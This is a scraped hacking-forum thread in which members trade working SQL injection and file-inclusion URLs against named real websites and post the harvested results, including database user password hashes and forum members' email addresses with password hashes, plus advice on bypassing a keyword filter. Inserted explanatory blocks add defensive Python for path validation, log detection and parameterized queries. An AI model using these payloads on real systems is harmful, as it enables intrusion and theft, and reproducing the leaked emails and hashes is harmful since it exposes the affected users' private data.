Your questions on vulnerabilities.

Discussion in 'Vulnerabilities' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Deani

    Deani New Member

    Tell me, how do you dump a database through sql inj?
     
  2. LokbatanLi

    LokbatanLi Member

    help please

    but this one doesn't work


    and like this neither
     
    #12362 LokbatanLi, 15 Apr 2010
    Last edited: 15 Apr 2010
  3. Pashkela

    Pashkela Dinosaur

    Code:
    http://www.venen-kur.info/index.php?id=1319&lang=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+
    
    what's the problem?
     
  4. LokbatanLi

    LokbatanLi Member

    and like this too

     
  5. Pashkela

    Pashkela Dinosaur

    Code:
    System information:
    -----------------------------------------
    base:db242799363
    basedir:/usr/local/mysql-5.0.81-linux-i686-glibc23/
    os:pc-linux-gnu
    ver:5.0.81-log
    datadir:/db/mysql/
    tmpdir:/var/tmp
    -----------------------------------------
    Tables in information_schema.tables - 29
    -----------------------------------------
    COLLATIONS
    COLUMNS
    COLUMN_PRIVILEGES
    ROUTINES
    SCHEMA_PRIVILEGES
    TABLES
    TABLE_PRIVILEGES
    USER_PRIVILEGES
    cms_languages
    cms_pages
    cms_settings
    user_functions
    user_groups
    user_platforms
    CHARACTER_SETS
    COLLATION_CHARACTER_SET_APPLICABILITY
    KEY_COLUMN_USAGE
    PROFILING
    SCHEMATA
    STATISTICS
    TABLE_CONSTRAINTS
    TRIGGERS
    VIEWS
    cms_media
    cms_related
    cms_trees
    user_group_functions
    user_in_group
    user_users
    -----------------------------------------
    Table [ user_users ]
    -----------------------------------------
    Database for user_users: example.com
    Number of columns in example.com.user_users: 9
    Columns in example.com.user_users
      username
      platform_id
      is_superuser
      first_login
      session_key
      id
      email
      password
      session
    ----------
    
    I don't see any problems
     
  6. Pashkela

    Pashkela Dinosaur

    well, actually yes))

    PS:

    Code:
    http://www.venen-kur.info/index.php?id=1319&lang=(select+1+from+(select+count(0),concat((select+password+from+user_users+limit+0,1),floor(rand(0)*2))+from+user_users+group+by+2)a)--+
    
     
    #12366 Pashkela, 15 Apr 2010
    Last edited: 15 Apr 2010
    1 person likes this.
  7. LokbatanLi

    LokbatanLi Member

    That's exactly what I pulled out too, but when you do concat(username it gives an error
     
  8. LokbatanLi

    LokbatanLi Member

    give me the link
     
  9. LokbatanLi

    LokbatanLi Member

    And where's the login and password?

    jmvN/m90uBX8OHg ??
     
  10. LokbatanLi

    LokbatanLi Member

    No, you did concat_ws%28 username,0x3a,password%29

    but only this is visible: jmvN/m90uBX8OHg

    and what is that, the login or the password?? and why only that?
     
  11. LokbatanLi

    LokbatanLi Member

    ok, understood.. thanks..
     
  12. Keltos

    Keltos Banned

    Help please:
    Here's a php injection:
    Code:
    http://www.partnersinpreservation.com/boston/index.php?sec=../../../../../../../../../../../../../etc/passwd%00&locID=16 
    I found a PHPSESSID there, it's j7h4hqb6d43c1f0e3bc84volf6
    I enter
    Code:
    http://www.partnersinpreservation.com/boston/index.php?sec=../../../../../../../../../../../../../tmp/sess_j7h4hqb6d43c1f0e3bc84volf6
    nothing there

    In what other directory could the session file be?
     
  13. Pashkela

    Pashkela Dinosaur

    Better study this:
    Code:
    http://www.partnersinpreservation.com/boston/index.php?sec=/proc/self/status%00
    
    http://www.partnersinpreservation.com/boston/index.php?sec=/etc/httpd/conf/httpd.conf%00
    
    http://www.partnersinpreservation.com/boston/index.php?sec=/proc/version%00
    
    https://forum.antichat.net/showpost.php?p=1088072&postcount=11
     
    #12373 Pashkela, 16 Apr 2010
    Last edited: 16 Apr 2010
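Added example, not part of any post in this thread: the inclusion pattern in the two posts above (`sec=../../../etc/passwd%00`, `sec=/proc/self/status%00`) works because the script includes whatever path the parameter names, and the NUL byte cuts off any suffix the script appends. A hardened resolver, written here in Python to illustrate what the PHP side would need, rejects NUL bytes, accepts only a bare allowlisted name, and checks that the resolved file still lies under the permitted directory. The directory path, the allowlist and the function names are assumptions of this example.

```python
import os
from urllib.parse import urlsplit, parse_qs

# Constructed values for this example: where page fragments live and which names exist.
SECTION_DIR = "/var/www/boston/sections"            # hypothetical, not the site's real layout
SECTION_NAMES = frozenset({"about", "contact", "news"})


def section_from_url(url):
    """Pull the raw 'sec' value out of a request URL, URL-decoded (so %00 becomes a real NUL)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    values = params.get("sec")
    return values[0] if values else None


def resolve_section(sec, section_dir=SECTION_DIR, allowed=SECTION_NAMES):
    """Return the absolute file to include, or None when the value must be rejected.

    Checks, in order:
      1. a NUL byte anywhere (the %00 truncation trick) is an immediate reject;
      2. the value must be a bare name: no '/', no '\\', not '.' or '..';
      3. the name must be on the allowlist, not merely 'look safe';
      4. the final resolved path must still lie under section_dir.
    """
    if not isinstance(sec, str) or not sec:
        return None
    if "\x00" in sec:
        return None
    if "/" in sec or "\\" in sec or sec in (".", ".."):
        return None
    if sec not in allowed:
        return None
    base = os.path.realpath(section_dir)
    candidate = os.path.realpath(os.path.join(base, sec + ".php"))
    # Belt and braces: even an allowlisted name must resolve inside the base directory.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed request on a placeholder host, carrying the traversal shape from the post above.
    url = "http://example.invalid/boston/index.php?sec=../../../../etc/passwd%00&locID=16"
    raw = section_from_url(url)
    print(repr(raw), "->", resolve_section(raw))      # rejected: None
    print("news ->", resolve_section("news"))          # accepted: .../sections/news.php
```

The allowlist is the real control here; the NUL and separator checks only give clearer rejections. Note that `parse_qs` already decodes `%00` into a real NUL, which is why the check must run on the decoded value and not on the raw query string.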
  14. durito

    durito Elder - Старейшина

    standard sqli

    http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=220%27

    but union and select are filtered by the NukeSentinel module

    http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=220+and+substring%28version%28%29,1,1%29=5

    select is also filtered in subqueries

    how to bypass it?
     
  15. nemaniak

    nemaniak Elder - Старейшина

    For example, like this

    Code:
    http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=-220+unIoN+SeLeCt+1,2+--+
     
    2 people like this.
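Added example, not written by anyone in this thread: why the mixed-case `unIoN SeLeCt` in the post above gets past a keyword filter, and what a log-side detector has to do instead. Constructed Apache combined-log lines carry the payload shapes quoted in this thread (the `floor(rand(0)*2)` / `group by` error-based form from posts 3 and 6, the mixed-case union from post 15, the `%00` traversal from post 12) and are matched only after URL-decoding and lower-casing. The IPs, timestamps, signature names and the log format are assumptions of this example, not anything from the page.

```python
import re
from urllib.parse import unquote_plus

# Apache combined-log shape: ip ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Matched against the URL-decoded, lower-cased request path.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?\bselect\b"),
    "subselect": re.compile(r"\(\s*select\b"),
    "dup_key_error_based": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*?\bgroup\s+by\b", re.S),
    "schema_enum": re.compile(r"\binformation_schema\b"),
    "version_probe": re.compile(r"\bversion\s*\(\s*\)"),
    "path_traversal": re.compile(r"(?:\.\./){2,}|\x00"),
}


def normalize(path):
    """URL-decode until stable (catches double encoding), then lower-case."""
    current = path
    for _ in range(3):                      # assumption: a few layers of encoding is enough
        decoded = unquote_plus(current)
        if decoded == current:
            break
        current = decoded
    return current.lower()


def naive_keyword_filter(path):
    """Case-sensitive blocklist of the kind the post above defeated; kept only for contrast."""
    return "union" in path or "select" in path


def classify(path):
    """Signature names that fire on one request path, sorted for stable output."""
    norm = normalize(path)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(norm))


def scan(lines):
    """Return (client_ip, request_path, signatures) for every log line with at least one hit."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                        # not a combined-log line; skip rather than guess
        ip, _method, path, _status, _size = m.groups()
        names = classify(path)
        if names:
            hits.append((ip, path, names))
    return hits


# Constructed log lines: the payload shapes quoted in this thread, with made-up IPs and times.
LOG_LINES = [
    '203.0.113.5 - - [15/Apr/2010:12:00:01 +0400] "GET /index.php?id=1319&lang=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+ HTTP/1.1" 500 512',
    '203.0.113.7 - - [16/Apr/2010:09:10:11 +0400] "GET /modules.php?name=Annonces&op=ViewCatg&id_catg=-220+unIoN+SeLeCt+1,2+--+ HTTP/1.1" 200 4096',
    '203.0.113.9 - - [16/Apr/2010:09:12:30 +0400] "GET /boston/index.php?sec=../../../../../../../../../../../../../etc/passwd%00&locID=16 HTTP/1.1" 200 2048',
    '198.51.100.2 - - [16/Apr/2010:09:15:00 +0400] "GET /index.php?id=1319&lang=en HTTP/1.1" 200 8192',
]

if __name__ == "__main__":
    for ip, path, names in scan(LOG_LINES):
        print(ip, names)
```

`naive_keyword_filter` returns False for the mixed-case request while `classify` still reports `union_select`, which is the whole difference between a filter that inspects raw bytes and one that canonicalizes first. Treat the signatures as triage hints for log review, not as a blocking rule: a blocklist is bypassable by construction, and the fix for the application stays parameterized queries.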
  16. GOGA075

    GOGA075 Elder - Старейшина

    Who can give me a good, powerful script to dump a 3 GB database? The ones I have give errors at such sizes!!
     
  17. jecka3000

    jecka3000 Elder - Старейшина

    GOGA075,
    download Sypex Dumper
     
  18. GOGA075

    GOGA075 Elder - Старейшина

    jecka3000, that's exactly the one that gives errors!!!
    Both 1.0.8b and 2.0.6
    can't handle such volumes!!
     
  19. Дирижабль

    Дирижабль [ ✯✯✯ Nuclear Suicide ✯✯✯ ]

    mmm... :)
    Code:
    http://amkar.properm.ru/info.php?id=-999.9+or%281,1%29=%28select+count%280%29,concat%28%28select+concat%28database%28%29%29+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29from%28information_schema.tables%29group+by+2%29

    Version:
    5.0.51a-24+lenny2-log
    Current User: properm@localhost
    Code:
    Data Bases:
    		_muzik
    		amkar
    		amkar_fan
    		amore
    		avto
    		baba
    		bikini
    		comix
    		contests
    		euroset
    		forum
    		globass
    		klass
    		kvn
    		led
    		linkation
    		map
    		miss_whatever
    		miss_zima
    		moda
    		muzik
    		muzik_old
    		mysql
    		nebo
    		nevesta
    		newseater
    		permskoe
    		properm
    		reality
    		reality_backup
    		seolib
    		sf
    		spravka
    		spravka2
    		spravka_backup_2009_10_31
    		spravka_backup_2009_11_07
    User:
                    'root'@'localhost'
    		'reality'@'localhost'
    		'realty'@'localhost'
    		'seo'@'localhost'
    		'sprvk'@'localhost'
    		'zabbix'@'localhost'
    		'spravka'@'localhost'
    		'properm'@'localhost'
    		'debian-sys-maint'@'localhost'
    		'root'@'proserv'
    		'alya'@'%'
    		'replication_user'@'%'
    		'remote_root'@'%'
    MySQL DB
    User                Password
    alya                *8D43FE3D5955DD53B1156534EE7AD854CA88FF24
    remote_root         
    replication_user    *A1DAA5D16F63E661DFFE8FB7E5CCF0E235F0C601
    debian-sys-maint    *D6E3AC52927F6BD477ACFEB9E18DCCC3094FFF97
    properm             *C58CE76F735421EB5B5BC2BB332CEF2674661499
    reality             *66758BD9AE5EFE6F5EFD754A0386969808EE2991
    realty              *27D8E13E226CE3F3DB6116796584A6BCF2AA3305
    root                *966F8B69DCE8F1383221C7E89C8AB06697332DAC
    seo                 *6063C78456BB048BAF36BE1104D12D547834DFEA
    spravka             *050376F3855A67F5E2C6514FD3130B31006C1276
    sprvk               *30763283C56FC465C0F1F869CD097A5ABDF1F4D9
    zabbix              *2D90A69B6136A8DE2E6B87DC14504CE500DA21CF
    root                *CAC83AB2E75198C3287CD7E81B808F9C6D54B41A
    
    
    DATABASE: forum
    (TABLES):
    fpp_admin_logs  	
    fpp_admin_sessions 	
    fpp_badwords 	
    fpp_cache_store 	
    fpp_calendar_events 	
    fpp_categories 	
    fpp_contacts 	
    fpp_css 	
    fpp_email_logs 	
    fpp_emoticons 	
    fpp_faq 	
    fpp_files 	
    fpp_files_cats 	
    fpp_files_comments 	
    fpp_files_custentered 	
    fpp_files_custfields 	
    fpp_files_downloads 	
    fpp_files_favorites 	
    fpp_files_votes 	
    fpp_forum_perms 	
    fpp_forum_tracker 	
    fpp_forums 	
    fpp_groups 	
    fpp_languages 	
    fpp_macro 	
    fpp_macro_name 	
    fpp_member_extra 	
    fpp_members 	
    fpp_messages 	
    fpp_moderator_logs 	
    fpp_moderators 	
    fpp_pfields_content 	
    fpp_pfields_data 	
    fpp_polls 	
    fpp_posts 	
    fpp_reg_antispam 	
    fpp_search_results 	
    fpp_sessions 	
    fpp_skin_templates 	
    fpp_skins 	
    fpp_spider_logs 	
    fpp_stats 	
    fpp_subscription_currency 	
    fpp_subscription_extra 	
    fpp_subscription_logs 	
    fpp_subscription_methods 	
    fpp_subscription_trans 	
    fpp_subscriptions 	
    fpp_templates 	
    fpp_titles 	
    fpp_tmpl_names 	
    fpp_topic_mmod 	
    fpp_topics 	
    fpp_tracker 	
    fpp_validating 	
    fpp_voters 	
    fpp_warn_logs 	
    ibf_admin_logs 	
    ibf_admin_sessions 	
    ibf_announcements 	
    ibf_attachments 	
    ibf_attachments_type 	
    ibf_badwords 	
    ibf_banfilters 	
    ibf_bulk_mail 	
    ibf_cache_store 	
    ibf_calendar_events 	
    ibf_conf_settings 	
    ibf_conf_settings_titles 	
    ibf_contacts 	
    ibf_custom_bbcode 	
    ibf_email_logs 	
    ibf_emoticons 	
    ibf_faq 	
    ibf_forum_perms 	
    ibf_forum_tracker 	
    ibf_forums 	
    ibf_groups 	
    ibf_languages 	
    ibf_mail_error_logs 	
    ibf_mail_queue 	
    ibf_member_extra 	
    ibf_members 	
    ibf_members_converge 	
    ibf_message_text 	
    ibf_message_topics 	
    ibf_moderator_logs 	
    ibf_moderators 	
    ibf_pfields_content 	
    ibf_pfields_data 	
    ibf_polls 	
    ibf_posts 	
    ibf_reg_antispam 	
    ibf_search_results 	
    ibf_sessions 	
    ibf_skin_macro 	
    ibf_skin_sets 	
    ibf_skin_templates 	
    ibf_skin_templates_cache 	
    ibf_spider_logs 	
    ibf_subscription_currency 	
    ibf_subscription_extra 	
    ibf_subscription_logs 	
    ibf_subscription_methods 	
    ibf_subscription_trans 	
    ibf_subscriptions 	
    ibf_task_logs 	
    ibf_task_manager 	
    ibf_titles 	
    ibf_topic_mmod 	
    ibf_topics 	
    ibf_topics_read 	
    ibf_tracker 	
    ibf_upgrade_history 	
    ibf_validating 	
    ibf_voters 	
    ibf_warn_logs
    
    Table: fpp_members
    
    email                 password                            name
    test@localhost.com                                        chucha
    pn@reaktive.ru 	7277da89be64a89aa02a2d7423a0c05c 	Guest
    red_ma@mail.ru 	81dc9bdb52d04dc20036dbd8313ed055 	Juissy
    vsv1407@yandex.ru 	1406e7afb3eb1f83b4bd4e310cee7fc6 	magic
    ca@properm.ru 	287e9593819b2fcdf9945e7ccacd637d 	reaktive
    pn@reaktive.ru 	72fed2b8265919690c815f0316b346cc 	scbsncks
    ve@properm.ru 	b0baee9d279d34fa1dfd71aadb908c3f 	wer
    stasne@yandex.ru 	48309aa13d9d9497b097495188b2863a 	Николай
     
    2 people like this.
  20. LokbatanLi

    LokbatanLi Member

    I looked at phpinfo(), and there magic_quotes_gpc is ON in the local value and OFF in the master value..
    so is it ON or OFF now??
     
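In phpinfo() the Local Value is the setting in effect for the script that produced the page (the Master Value is what php.ini set before any per-directory or runtime override), so in the post above magic_quotes_gpc is on. Added example, not from any poster here: even when it is on, it changes nothing for the injections quoted in this thread, because they sit in a numeric context and contain no quote characters for addslashes() to escape. A Python/sqlite3 re-creation of the `id_catg` lookup from post 14 shows the escaped payload still executing, a parameterized query binding the same payload as an inert value, and an integer cast rejecting it outright. The table, its rows, the `addslashes` emulation and the function names are constructed for this example.

```python
import sqlite3


def addslashes(value):
    """Emulate PHP's magic_quotes_gpc (addslashes): escape quotes, backslashes and NUL."""
    return (value.replace("\\", "\\\\")
                 .replace("'", "\\'")
                 .replace('"', '\\"')
                 .replace("\x00", "\\0"))


def make_db():
    """Constructed stand-in for the module's category table; not the real schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE categories (id_catg INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO categories VALUES (220, 'Meetings');
        INSERT INTO categories VALUES (221, 'Events');
    """)
    return conn


def lookup_vulnerable(conn, id_catg):
    # The classic PHP shape: "... WHERE id_catg=" . $_GET['id_catg'], with magic quotes applied.
    # No quotes surround the value, so addslashes() has nothing to escape and the text is parsed as SQL.
    sql = "SELECT id_catg, title FROM categories WHERE id_catg = " + addslashes(id_catg)
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, id_catg):
    # The value is bound, never parsed; a non-numeric string simply matches no integer key.
    return conn.execute(
        "SELECT id_catg, title FROM categories WHERE id_catg = ?", (id_catg,)
    ).fetchall()


def lookup_typed(conn, id_catg):
    # Stronger still for an integer parameter: coerce first, reject anything that is not an int.
    try:
        number = int(id_catg)
    except (TypeError, ValueError):
        return None
    return lookup_parameterized(conn, number)


# Payload exactly as it decodes from the URL in post 15 (the '+' characters are spaces).
PAYLOAD = "-220 unIoN SeLeCt 1,2 -- "

if __name__ == "__main__":
    db = make_db()
    print(addslashes(PAYLOAD) == PAYLOAD)      # True: escaping did not touch it
    print(lookup_vulnerable(db, PAYLOAD))      # [(1, 2)]: the UNION ran
    print(lookup_parameterized(db, PAYLOAD))   # []: bound as a literal
    print(lookup_typed(db, PAYLOAD))           # None: rejected before any query
    print(lookup_typed(db, "220"))             # [(220, 'Meetings')]
```

The point for the poster's question is that the on/off state of magic_quotes_gpc is irrelevant to a query like the one in post 14: escaping only matters inside a quoted string, and the fix that holds in both contexts is binding the value (and, for ids, casting it) rather than splicing it into SQL text.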